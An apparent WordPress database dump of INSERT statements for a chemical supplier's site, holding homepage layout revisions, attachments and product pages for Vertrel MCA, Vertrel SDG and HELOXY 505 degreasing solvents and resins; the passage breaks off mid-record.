INSERT INTO `wp_posts` VALUES (1259, 2, '2016-09-06 18:32:25', '2016-09-06 18:32:25', '', 'fluoroextreme', '', 'inherit', 'open', 'closed', '', 'fluoroextreme-2', '', '', '2016-09-06 18:32:25', '2016-09-06 18:32:25', '', 0, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/09/fluoroextreme.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (1260, 2, '2016-09-06 18:33:12', '2016-09-06 18:33:12', '[ux_banner_grid height="400px" padding="10px"]\r\n\r\n[row]\r\n\r\n[col span="2/6"]\r\n\r\n[ux_banner height="150px" bg="#002c56" link="https://www.miller-stephenson.com/chemicals/release-agents/" text_color="light" text_width="60%" text_bg="#002c56"]\r\n\r\n&nbsp;\r\n<h3 class="alt-font" style="color: white;">Quality &amp; Service</h3>\r\n<h2 class="animated fadeInLeft uppercase" style="color: white;">SINCE 1955</h2>\r\n[button text="MORE" link="about" style="primary alt-button" size="normal"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner link="https://www.miller-stephenson.com/chemicals/release-agents/" height="240px" bg="86" animated="fadeIn" text_width="40%" text_align="right" text_pos="full-width far-top" parallax="0" parallax_text="0" hover="zoom"]\r\n\r\n[button text="RELEASE AGENTS" link="chemicals/release-agents/" style="primary"]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="2/6"]\r\n\r\n[ux_banner height="400px" bg="78" link="chemicals/krytox/" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="KRYTOX™\r\n&amp; LUBRICANTS" link="chemicals/krytox-tribosys-finish-line/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="1/6"]\r\n\r\n[ux_banner height="195px" bg="11" link="chemicals/solvents/" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="SPECIALTY PRODUCTS\r\n&amp; SOLVENTS" link="chemicals/solvents/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="195px" bg="7" link="chemicals/conformal-coatings/" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="EPOXY\r\n&amp; CONFORMAL COATINGS" link="chemicals/conformal-coatings/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="1/6"]\r\n\r\n[ux_banner height="120px" bg="233" animated="fadeIn" text_width="40%" text_align="right" text_pos="full-width far-top" parallax="0" parallax_text="0" hover="zoom"]\r\n\r\n[button size="medium" style="primary" text="MEDICAL\r\nCHEMICALS" link="https://" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="270px" bg="91" link="chemicals/vazo/" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="VAZO\r\nRADICAL INITIATORS" link="chemicals/vazo/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[/ux_banner_grid]\r\n\r\n[row]\r\n\r\n[col span="1/1"]\r\n\r\n[gap height="5px"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[row]\r\n\r\n[col span="1/3" align="0"]\r\n<h3>Technical Support</h3>\r\nOur team of experts are available to provide you with a level of service and attention unsurpassed in the industry.\r\n\r\n[/col]\r\n\r\n[col span="1/3"]\r\n<h3>Application Experts</h3>\r\nWith over 50 years of knowledge &amp; experience, Miller Stephenson\'s team of experts can help you find the solution to a successful application.\r\n\r\n[/col]\r\n\r\n[col span="1/3"]\r\n<h3>Large Inventory</h3>\r\nWe are committed to ensuring that our customers can count on us to provide swift delivery and fulfillment of their orders.\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[ux_banner height="300px" bg="https://imageurl" text_color="light" animated="rotateInUpLeft" text_width="70%" text_align="center" text_pos="center" parallax_text="0" effect="sparkle" hover="zoom"]\r\n<h4 class="alt-font">INTRODUCING</h4>\r\n___\r\n<h1>ReleaSys <strong>™ </strong></h1>\r\n<h4 class="thin-font">Our new semi-permanent mold release agents</h4>\r\n[button text="TELL ME MORE" link="introducing-releasys-our-newest-release-agent/" style="white alt-button"]\r\n\r\n[/ux_banner]\r\n\r\n[gap height="30px"]\r\n\r\n[row]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image title="FluoroExtreme" id="1259" image_size="Original"]\r\n\r\n[/col]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image title="ShieldSys" id="1253" image_size="Original"]\r\n\r\n[/col]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image title="TriboSys" id="1249" image_size="Original"]\r\n\r\n[/col]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image id="1248"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[row]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image id="595"]\r\n\r\n[/col]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image id="596"]\r\n\r\n[/col]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image id="1255"]\r\n\r\n[/col]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image id="1257"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[gap height="30px"]', 'Home', '', 'inherit', 'closed', 'closed', '', '64-revision-v1', '', '', '2016-09-06 18:33:12', '2016-09-06 18:33:12', '', 64, 'https://132.148.10.86/wordpress/64-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (1261, 2, '2016-09-06 18:36:17', '2016-09-06 18:36:17', '', 'hexion-logo', '', 'inherit', 'open', 'closed', '', 'hexion-logo', '', '', '2016-09-06 18:36:17', '2016-09-06 18:36:17', '', 0, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/09/hexion-logo.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (1262, 2, '2016-09-06 18:36:54', '2016-09-06 18:36:54', '[ux_banner_grid height="400px" padding="10px"]\r\n\r\n[row]\r\n\r\n[col span="2/6"]\r\n\r\n[ux_banner height="150px" bg="#002c56" link="https://www.miller-stephenson.com/chemicals/release-agents/" text_color="light" text_width="60%" text_bg="#002c56"]\r\n\r\n&nbsp;\r\n<h3 class="alt-font" style="color: white;">Quality &amp; Service</h3>\r\n<h2 class="animated fadeInLeft uppercase" style="color: white;">SINCE 1955</h2>\r\n[button text="MORE" link="about" style="primary alt-button" size="normal"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner link="https://www.miller-stephenson.com/chemicals/release-agents/" height="240px" bg="86" animated="fadeIn" text_width="40%" text_align="right" text_pos="full-width far-top" parallax="0" parallax_text="0" hover="zoom"]\r\n\r\n[button text="RELEASE AGENTS" link="chemicals/release-agents/" style="primary"]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="2/6"]\r\n\r\n[ux_banner height="400px" bg="78" link="chemicals/krytox/" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="KRYTOX™\r\n&amp; LUBRICANTS" link="chemicals/krytox-tribosys-finish-line/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="1/6"]\r\n\r\n[ux_banner height="195px" bg="11" link="chemicals/solvents/" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="SPECIALTY PRODUCTS\r\n&amp; SOLVENTS" link="chemicals/solvents/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="195px" bg="7" link="chemicals/conformal-coatings/" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="EPOXY\r\n&amp; CONFORMAL COATINGS" link="chemicals/conformal-coatings/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="1/6"]\r\n\r\n[ux_banner height="120px" bg="233" animated="fadeIn" text_width="40%" text_align="right" text_pos="full-width far-top" parallax="0" parallax_text="0" hover="zoom"]\r\n\r\n[button size="medium" style="primary" text="MEDICAL\r\nCHEMICALS" link="https://" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="270px" bg="91" link="chemicals/vazo/" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="VAZO\r\nRADICAL INITIATORS" link="chemicals/vazo/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[/ux_banner_grid]\r\n\r\n[row]\r\n\r\n[col span="1/1"]\r\n\r\n[gap height="5px"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[row]\r\n\r\n[col span="1/3" align="0"]\r\n<h3>Technical Support</h3>\r\nOur team of experts are available to provide you with a level of service and attention unsurpassed in the industry.\r\n\r\n[/col]\r\n\r\n[col span="1/3"]\r\n<h3>Application Experts</h3>\r\nWith over 50 years of knowledge &amp; experience, Miller Stephenson\'s team of experts can help you find the solution to a successful application.\r\n\r\n[/col]\r\n\r\n[col span="1/3"]\r\n<h3>Large Inventory</h3>\r\nWe are committed to ensuring that our customers can count on us to provide swift delivery and fulfillment of their orders.\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[ux_banner height="300px" bg="https://imageurl" text_color="light" animated="rotateInUpLeft" text_width="70%" text_align="center" text_pos="center" parallax_text="0" effect="sparkle" hover="zoom"]\r\n<h4 class="alt-font">INTRODUCING</h4>\r\n___\r\n<h1>ReleaSys <strong>™ </strong></h1>\r\n<h4 class="thin-font">Our new semi-permanent mold release agents</h4>\r\n[button text="TELL ME MORE" link="introducing-releasys-our-newest-release-agent/" style="white alt-button"]\r\n\r\n[/ux_banner]\r\n\r\n[gap height="30px"]\r\n\r\n[row]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image title="FluoroExtreme" id="1259" image_size="Original"]\r\n\r\n[/col]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image title="ShieldSys" id="1253" image_size="Original"]\r\n\r\n[/col]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image title="TriboSys" id="1249" image_size="Original"]\r\n\r\n[/col]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image id="1248"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[row]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image id="595"]\r\n\r\n[/col]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image id="1261"]\r\n\r\n[/col]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image id="1255"]\r\n\r\n[/col]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image id="1257"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[gap height="30px"]', 'Home', '', 'inherit', 'closed', 'closed', '', '64-revision-v1', '', '', '2016-09-06 18:36:54', '2016-09-06 18:36:54', '', 64, 'https://132.148.10.86/wordpress/64-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (1263, 2, '2016-09-07 13:40:43', '2016-09-07 13:40:43', 'Vertrel™ MCA is a proprietary azeotrope of <a href="https://www.miller-stephenson.com/product/vertrel-xf/">Vertrel™ XF</a> hydrofluorocarbon (2,3-dihydrodeca-fluoropentane) with trans-1,2-dichloroethylene. It is ideally suited for use in vapor degreasing equipment. Its enhanced solvency power, compared to <a href="https://www.miller-stephenson.com/product/vertrel-xf/">Vertrel™ XF</a> alone, makes it particularly effective for precision and specialty cleaning with difficult soils.\r\n\r\nVertrel™ MCA has zero ozone depletion potential and low global warming potential. It can replace CFC-113, methylchloroform (1,1,1-TCA), hydrochlorofluorocarbons (HCFCs), and perfluorocarbons (PFCs) in many applications. Vertrel MCA is accepted by the U.S. Environmental Protection Agency (EPA) under the Significant New Alternatives Policy (SNAP) program, as a substitute for ozone-depleting substances.\r\n\r\n<strong>Cleaning Process</strong>\r\n\r\nVapor degreasing should be used for optimum cleaning effectiveness and economy. Modern vapor containment technology is recommended for both batch and in-line equipment. These systems have higher freeboard and a secondary set of low-temperature (–29°C [–20°F]) condenser coils to reduce vapor loss.\r\n\r\nVertrel™ MCA has a broad range of cleaning capabilities. Table 1 lists some typical soils readily removed from parts in a short vapor degreasing cycle.\r\n\r\nTable 1. Soils Cleaned with Vertrel MCA\r\n<table width="465">\r\n<tbody>\r\n<tr>\r\n<td width="223">Cutting Oils</td>\r\n<td width="242">Stamping Oils</td>\r\n</tr>\r\n<tr>\r\n<td>Gear Oils</td>\r\n<td>Vacuum Oils</td>\r\n</tr>\r\n<tr>\r\n<td>Heavy Greases</td>\r\n<td>Waxes</td>\r\n</tr>\r\n<tr>\r\n<td>Hydraulic Oils</td>\r\n<td>Mineral Oils</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<strong>Plastic and Elastomer Compatibility</strong>\r\n\r\nVertrel™ MCA is compatible with most polymeric materials commonly encountered in degreasing of precision parts. Acrylic, ABS, and polycarbonate parts, particularly if under stress, may show slight cracking or crazing damage and should be tested. EPDM, butyl rubber, Buna-S, and neoprene are recommended for elastomeric parts.\r\n\r\nTables 2 and 3 summarize test results on short-term exposures of unstressed plastics and elastomers simulating a typical cleaning cycle. Long-term compatibility data simulating exposure of vapor degreaser construction materials is available from Miller-Stephenson upon request.\r\n\r\n<strong>Table 2.</strong> Plastic Compatibility Immersion: 15 Minutes at Room Temperature\r\n<table width="465">\r\n<tbody>\r\n<tr>\r\n<td style="text-align: center;" colspan="2" width="465"><strong>Compatible</strong></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: left;">Polyethylene</td>\r\n<td style="text-align: left;">Acetal</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: left;">Polyvinylchloride</td>\r\n<td style="text-align: left;">Epoxy</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: left;">Polyester, PET, PBT</td>\r\n<td style="text-align: left;">Liquid Crystal Polymer</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: left;">Polyimide, PI, PEI, PAI</td>\r\n<td style="text-align: left;">Phenolic</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: left;">Polyetherketone, PEK</td>\r\n<td>PTFE, ETFE</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: left;">Polyaryletherketone, PEEK</td>\r\n<td style="text-align: left;">Chlorinated PVC</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: left;">Polyarylsulfone, PAS</td>\r\n<td style="text-align: left;">Ionomer</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: left;">Polypropylene</td>\r\n<td style="text-align: left;">ABS</td>\r\n</tr>\r\n<tr>\r\n<td>Polyphenylene Sulfide, PPS</td>\r\n<td>Polysulfone, PSO</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" colspan="2"><strong>Incompatible*</strong></td>\r\n</tr>\r\n<tr>\r\n<td>Polystyrene</td>\r\n<td>Acrylic</td>\r\n</tr>\r\n<tr>\r\n<td>Polyphenylene Oxide, PPO</td>\r\n<td>Cellulosic</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n*Material composition varies depending upon compounding agents, plasticizers, processing, etc. Specific materials should be tested for compatibility with solvent.\r\n\r\n<strong>Table 3. </strong>Elastomer Compatibility Immersion: 1 Week at 39°C (102°F)\r\n<table width="465">\r\n<tbody>\r\n<tr>\r\n<td style="text-align: center;" colspan="2" width="465"><strong>Compatible</strong></td>\r\n</tr>\r\n<tr>\r\n<td>Polysulfide (Thiokol FA)</td>\r\n<td>EPDM (Nordel®)</td>\r\n</tr>\r\n<tr>\r\n<td>Chlorosulfonated PE</td>\r\n<td>Butyl Rubber*</td>\r\n</tr>\r\n<tr>\r\n<td>Neoprene*</td>\r\n<td></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" colspan="2"><strong>Require Additional Testing</strong></td>\r\n</tr>\r\n<tr>\r\n<td>Buna-N</td>\r\n<td>Polychloroprene</td>\r\n</tr>\r\n<tr>\r\n<td>Urethane</td>\r\n<td>Silicone</td>\r\n</tr>\r\n<tr>\r\n<td>Buna-S*</td>\r\n<td>Natural Rubber</td>\r\n</tr>\r\n<tr>\r\n<td>Fluoroelastomers</td>\r\n<td></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n*Swelling, but with low extractables\r\n\r\nElastomer swelling and shrinking will, in most cases, revert to within a few percent of original size after air drying. Swell, shrinkage, and extractables are strongly affected by the compounding agents, plasticizers, and curing used in the manufacture of plastics and elastomers. Therefore, prior in-use testing is particularly important.\r\n\r\n<strong>Metals and Other Compatibility</strong>\r\n\r\nVertrel™ MCA was found compatible with aluminum, copper, and iron, with and without oil present, after exposure for 2 weeks at 120°C (248°F) in sealed tubes. Contact with highly basic process materials, pH 10 or above, is not recommended.\r\n\r\n<strong>Safety/Flammability</strong>\r\n\r\nVertrel™ MCA exhibits no closed cup or open cup flash point and is not classified as a flammable liquid by NFPA or DOT. In addition, the product has no vapor flammability limits in air. Flash point data and limits of flammability in air provide the user with additional information that should be used as elements of a fire risk assessment and to determine guidelines for the safe handling of volatile chemicals. Users should ensure compliance with NFPA standards and local fire codes.\r\n\r\n<strong>Recovery</strong>\r\n\r\nDue to the azeotropic nature of Vertrel™ MCA, the product is easily recoverable by off-line or in-line distillation equipment, such as a vapor degreaser or still. The presence of soil, however, may alter the characteristics of the material during the recovery operation. Recovery should be closely monitored to ensure operating levels are maintained. Users should test the spent Vertrel™ MCA to ensure proper classification for waste disposal.\r\n\r\n<strong>Environmental Legislation</strong>\r\n\r\nVertrel™ specialty fluids have zero ozone depletion potential and low global warming potential (Table 7). They are used as alternatives to CFC-113, methylchloroform, HCFCs, and PFCs in many critical cleaning, drying, carrier fluid, and other high-value specialty uses where reliability is paramount.\r\n\r\nVertrel™ MCA is accepted by the EPA under the SNAP program as a substitute for ozone-depleting substances.\r\n\r\nThe components of Vertrel™ MCA are listed in the TSCA inventory. One component, HFC-43-10mee, is subject to the Significant New Use Rule (SNUR) and should be used only in the indicated applications. See SDS Regulatory Section.\r\n\r\nVertrel™ MCA is not a hazardous air pollutant (HAP) and, therefore, not subject to NESHAP regulation. Vertrel MCA is not included in the SARA Title III Section 313 list of toxic chemicals and is not subject to SARA Title III (EPCRA) reporting requirements.\r\n\r\n<a href="https://www.miller-stephenson.com/vertrel-fluids/">To learn more about Vertrel™ and its ability to remove nPBs please click here. </a>\r\n\r\n<a href="https://www.miller-stephenson.com/opteon-sion-vapor-degreasing/">Click here to learn more about Opteon Sion and vapor degreasing.</a>\r\n\r\n&nbsp;\r\n\r\n&nbsp;', 'Vertrel™ MCA', 'Vertrel™ MCA has zero ozone depletion potential and low global warming potential. It can replace CFC-113, methylchloroform (1,1,1-TCA), hydrochlorofluorocarbons (HCFCs), and perfluorocarbons (PFCs) in many applications.', 'publish', 'open', 'closed', '', 'vertrel-mca', '', '', '2017-05-11 19:09:41', '2017-05-11 19:09:41', '', 0, 'https://132.148.10.86/wordpress/?post_type=product&#038;p=1263', 0, 'product', '', 0); 
INSERT INTO `wp_posts` VALUES (1264, 2, '2016-09-07 13:37:54', '2016-09-07 13:37:54', '', 'Vertrel MCA', '', 'inherit', 'open', 'closed', '', 'vertrel-solvent', '', '', '2016-10-06 17:47:14', '2016-10-06 17:47:14', '', 1263, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/09/vertrel-solvent.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (1265, 2, '2016-09-07 13:39:59', '2016-09-07 13:39:59', '', 'MCA EC', '', 'inherit', 'open', 'closed', '', 'mca-ec', '', '', '2016-09-07 13:39:59', '2016-09-07 13:39:59', '', 1263, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/09/MCA-EC.pdf', 0, 'attachment', 'application/pdf', 0); 
INSERT INTO `wp_posts` VALUES (1266, 2, '2016-09-07 13:40:05', '2016-09-07 13:40:05', '', 'SDG EC', '', 'inherit', 'open', 'closed', '', 'sdg-ec', '', '', '2016-09-07 13:40:05', '2016-09-07 13:40:05', '', 1263, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/09/SDG-EC.pdf', 0, 'attachment', 'application/pdf', 0); 
INSERT INTO `wp_posts` VALUES (1267, 2, '2016-09-07 13:40:13', '2016-09-07 13:40:13', '', 'SFR EC', '', 'inherit', 'open', 'closed', '', 'sfr-ec', '', '', '2016-09-07 13:40:13', '2016-09-07 13:40:13', '', 1263, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/09/SFR-EC.pdf', 0, 'attachment', 'application/pdf', 0); 
INSERT INTO `wp_posts` VALUES (1268, 2, '2016-09-07 13:41:38', '2016-09-07 13:41:38', '<strong>Introduction to Vertrel SDG</strong>\r\n\r\nVertrel SDG is an engineered mixture of nonflammable hydrofluorocarbons (HFCs) and trans-1,2-dichloroethylene (t-DCE). Vertrel SDG is designed to replace trichloroethylene (TCE) and n-propyl bromide (nPB); and perform in applications where maximum cleaning power is needed. It can also be used as a substitute for other cleaners such HCFC-225 and its blends, HCFC-141b, HFEs, PFCs, CFCs, and aqueous cleaners when safety and environmental concerns and/or floor space and cleanliness are at a premium.\r\n\r\nVertrel SDG has excellent solvency power for a wide range of soils including oils, greases, waxes and hydraulic fluids. The high solvency power, low surface tension and non-flammability properties of Vertrel SDG make it an ideal ultrasonic vapor degreasing solvent.\r\n\r\n<strong>Features and Benefits</strong>\r\n\r\nSDG does a good job balancing performance with favorable environmental and worker safety properties.\r\n<ul>\r\n 	<li>Excellent solvency power (KB Value = 95): Superior cleaning performance</li>\r\n 	<li>Good solvency for silicone fluids</li>\r\n 	<li>Fast drying: Increases productivity</li>\r\n 	<li>Low surface tension: Able to penetrate and clean tight areas</li>\r\n 	<li>Compatible with most plastics, elastomers, and metals</li>\r\n 	<li>Can be used with ultrasonics</li>\r\n 	<li>Non flammable</li>\r\n 	<li>Low toxicity</li>\r\n 	<li>Zero ozone depletion potential</li>\r\n 	<li>Low global warming potential</li>\r\n 	<li>Existing equipment can be used with minor or no modification</li>\r\n 	<li>No surfactants needed: Residue free cleaning is promoted.</li>\r\n</ul>\r\n<strong>Typical Applications</strong>\r\n\r\nVertrel SDG is ideal for a wide range of cleaning applications including:\r\n<ul>\r\n 	<li>Oil, grease, and wax removal</li>\r\n 	<li>Silicone carrier fluid</li>\r\n 	<li>Silicone grease removal</li>\r\n 	<li>Precision Cleaning</li>\r\n</ul>\r\n<strong>Specification Conformity Tests</strong>\r\n\r\nVertrel SDG has been tested in a variety of industry tests, including:\r\nBoeing D6-17487 Revision P Solvent Cleaners; General Cleaning\r\nARP 1755 B Effect of Cleaning Agent on Aircraft Engine Materials\r\n\r\nDouglas Aircraft Company Type 1: Materials and Procedures for General Exterior Cleaning of Painted and Unpainted Surfaces. (General Purpose Cleaner)\r\n\r\n<strong>Environmental</strong>\r\n\r\nVertrel SDG has “zero” ozone depletion potential and low global warming potential. See table below for various environmental properties of Vertrel SDG. Vertrel SDG is accepted by the US Environmental Protection Agency under the Significant New Alternatives Policy (SNAP) program as a substitute for ozone-depleting substances (solvent category). It is not SNAP approved for aerosol packages.\r\n\r\n<strong>Safety/Flammability/Storage</strong>\r\n\r\nData from acute toxicity studies has demonstrated that SDG has low toxicity. It has a calculated AEL (Acceptable Exposure Limit) of 193 ppm based on its individual components. AEL is an airborne inhalation exposure limit established by Dupont that specifies time-weighted average concentrations to which nearly all workers may be repeatedly exposed without adverse effects. The calculated AEL is in accordance with ACGIH formulas for TLVs for mixtures. Vertrel SDG is a slight skin and eye irritant and has low acute inhalation toxicity.\r\n\r\nPlease refer to the MSDS for information on detailed exposure limits and toxicity-related data.\r\n\r\nVertrel SDG exhibits no closed cup or open cup flash point and is not classified as a flammable liquid by NFPA or DOT. The product is volatile, and if allowed to evaporate and mix with air, the vapor may become flammable. Addition of alcohols such as methanol, ethanol or isopropanol to Vertrel SDG will increase the flammability of Vertrel SDG. Therefore, it is recommended that alcohol should not be mixed with SDG.\r\n\r\n<strong>Material Compatibility</strong>\r\n\r\nSDG is compatible with metals. Plastics that may show signs of softening, swelling or other changes include acrylics, ABS and polycarbonate. Elastomers, if affected, will generally revert to within a few percent of original size after air-drying. Prior-to-use, testing of plastics and elastomers should be performed under conditions expected during normal operation (e.g., time in contact with Vertrel SDG, temperature, etc.). For more information on material compatibility, contact Miller-Stephenson.\r\n\r\nContact with highly basic materials, pH 10 and above, is not recommended.\r\n\r\n<a href="https://www.miller-stephenson.com/vertrel-fluids/">To learn more please click here.</a>\r\n\r\nhttps://www.miller-stephenson.com/opteon-sion-vapor-degreasing/', 'Vertrel SDG', 'Vertrel SDG is an engineered mixture of nonflammable hydrofluorocarbons (HFCs) and trans-1,2-dichloroethylene (t-DCE). Vertrel SDG is designed to replace trichloroethylene (TCE) and n-propyl bromide (nPB); and perform in applications where maximum cleaning power is needed.', 'publish', 'open', 'closed', '', 'vertrel-sdg', '', '', '2016-10-13 17:03:31', '2016-10-13 17:03:31', '', 0, 'https://132.148.10.86/wordpress/product/vertrel-sdg/', 0, 'product', '', 0); 
INSERT INTO `wp_posts` VALUES (1270, 3, '2016-09-07 14:30:40', '2016-09-07 14:30:40', '', 'HELOXY™ 505', 'HELOXY™ Modifier 505 is a low viscosity polyepoxide resin that imparts flexibility, impact resistance and thermal shock resistance when incorporated in a wide variety of epoxy formulations. Applications include: Stress relieved concrete patching and surfacing compounds; Thermal shock resistant potting and dip coating compounds; High impact resistant tooling compounds; High peel strength adhesives.', 'publish', 'open', 'closed', '', 'heloxy-505', '', '', '2016-09-21 15:16:43', '2016-09-21 15:16:43', '', 0, 'https://132.148.10.86/wordpress/?post_type=product&#038;p=1270', 0, 'product', '', 0); 
INSERT INTO `wp_posts` VALUES (1271, 2, '2016-09-07 13:48:12', '2016-09-07 13:48:12', '', 'vertrel-sdg', '', 'inherit', 'open', 'closed', '', 'vertrel-sdg', '', '', '2016-09-07 13:48:12', '2016-09-07 13:48:12', '', 1268, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/09/vertrel-sdg.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (1272, 3, '2016-09-07 13:48:45', '2016-09-07 13:48:45', '', 'heloxy 505', '', 'inherit', 'open', 'closed', '', 'heloxy-505', '', '', '2016-09-07 13:48:45', '2016-09-07 13:48:45', '', 1270, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/09/heloxy-505.pdf', 0, 'attachment', 'application/pdf', 0); 
INSERT INTO `wp_posts` VALUES (1273, 2, '2016-09-07 14:12:29', '2016-09-07 14:12:29', '', 'vertrel-sdg-2', '', 'inherit', 'open', 'closed', '', 'vertrel-sdg-2', '', '', '2016-09-07 14:12:29', '2016-09-07 14:12:29', '', 1268, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/09/vertrel-sdg-2.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (1274, 2, '2016-10-06 18:08:48', '2016-10-06 18:08:48', '<strong>Introduction</strong>\n\nVertrel SDG is an engineered mixture of nonflammable hydrofluorocarbons (HFCs) and trans-1,2-dichloroethylene (t-DCE). Vertrel SDG is designed to replace trichloroethylene (TCE) and n-propyl bromide (nPB); and perform in applications where maximum cleaning power is needed. It can also be used as a substitute for other cleaners such HCFC-225 and its blends, HCFC-141b, HFEs, PFCs, CFCs, and aqueous cleaners when safety and environmental concerns and/or floor space and cleanliness are at a premium.\n\nVertrel SDG has excellent solvency power for a wide range of soils including oils, greases, waxes and hydraulic fluids. The high solvency power, low surface tension and non-flammability properties of Vertrel SDG make it an ideal ultrasonic vapor degreasing solvent.\n\n<strong>Features and Benefits</strong>\n\nVertrel SDG does a good job balancing performance with favorable environmental and worker safety properties.\n<ul>\n 	<li>Excellent solvency power (KB Value = 95): Superior cleaning performance</li>\n 	<li>Good solvency for silicone fluids</li>\n 	<li>Fast drying: Increases productivity</li>\n 	<li>Low surface tension: Able to penetrate and clean tight areas</li>\n 	<li>Compatible with most plastics, elastomers, and metals</li>\n 	<li>Can be used with ultrasonics</li>\n 	<li>Non flammable</li>\n 	<li>Low toxicity</li>\n 	<li>Zero ozone depletion potential</li>\n 	<li>Low global warming potential</li>\n 	<li>Existing equipment can be used with minor or no modification</li>\n 	<li>No surfactants needed: Residue free cleaning is promoted.</li>\n</ul>\n<strong>Typical Applications</strong>\n\nVertrel SDG is ideal for a wide range of cleaning applications including:\n<ul>\n 	<li>Oil, grease, and wax removal</li>\n 	<li>Silicone carrier fluid</li>\n 	<li>Silicone grease removal</li>\n 	<li>Precision 